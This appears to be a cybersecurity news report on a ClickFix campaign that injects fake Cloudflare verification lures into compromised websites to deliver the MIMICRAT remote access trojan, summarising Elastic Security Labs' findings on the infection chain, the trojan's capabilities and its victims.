Details have been revealed by cybersecurity researchers regarding a new ClickFix campaign that exploits compromised legitimate websites to distribute a previously unknown remote access trojan (RAT) known as MIMICRAT (also referred to as AstarionRAT).
The campaign showcases a high level of operational sophistication, utilizing compromised sites from various industries and regions as delivery infrastructure. A multi-stage PowerShell chain is used to bypass ETW and AMSI, followed by the deployment of a Lua-scripted shellcode loader. The final implant communicates via HTTPS on port 443, mimicking legitimate web analytics traffic, as reported by Elastic Security Labs.
MIMICRAT is identified as a custom C++ RAT with features such as Windows token impersonation, SOCKS5 tunneling, and a comprehensive set of 22 commands for post-exploitation activities. The campaign was unearthed earlier this month.
There are similarities between this campaign and another ClickFix campaign identified by Huntress, which leads to the deployment of the Matanbuchus 3.0 loader, serving as a conduit for the same RAT. The ultimate goal of the attack seems to be either ransomware deployment or data exfiltration.
The infection chain, outlined by Elastic, begins with bincheck[.]io, a legitimate BIN validation service that was compromised to inject malicious JavaScript code. This code loads an externally hosted PHP script, which then delivers the ClickFix lure through a fake Cloudflare verification page, prompting the victim to run a command in the Windows Run dialog.
This action triggers a PowerShell command, connecting to a command-and-control server to retrieve a second-stage PowerShell script that patches ETW and AMSI, before dropping a Lua-based loader. In the final phase, the Lua script decrypts and executes shellcode in memory to deliver MIMICRAT.
The Trojan employs HTTPS for communication with the C2 server, enabling it to accept commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.
Security researcher Salim Bitam noted that the campaign supports 17 languages, with the lure content dynamically localized based on the victim’s browser language settings. Victims have been observed across various regions, including a university in the USA and multiple Chinese-speaking users in public forums, indicating broad opportunistic targeting.
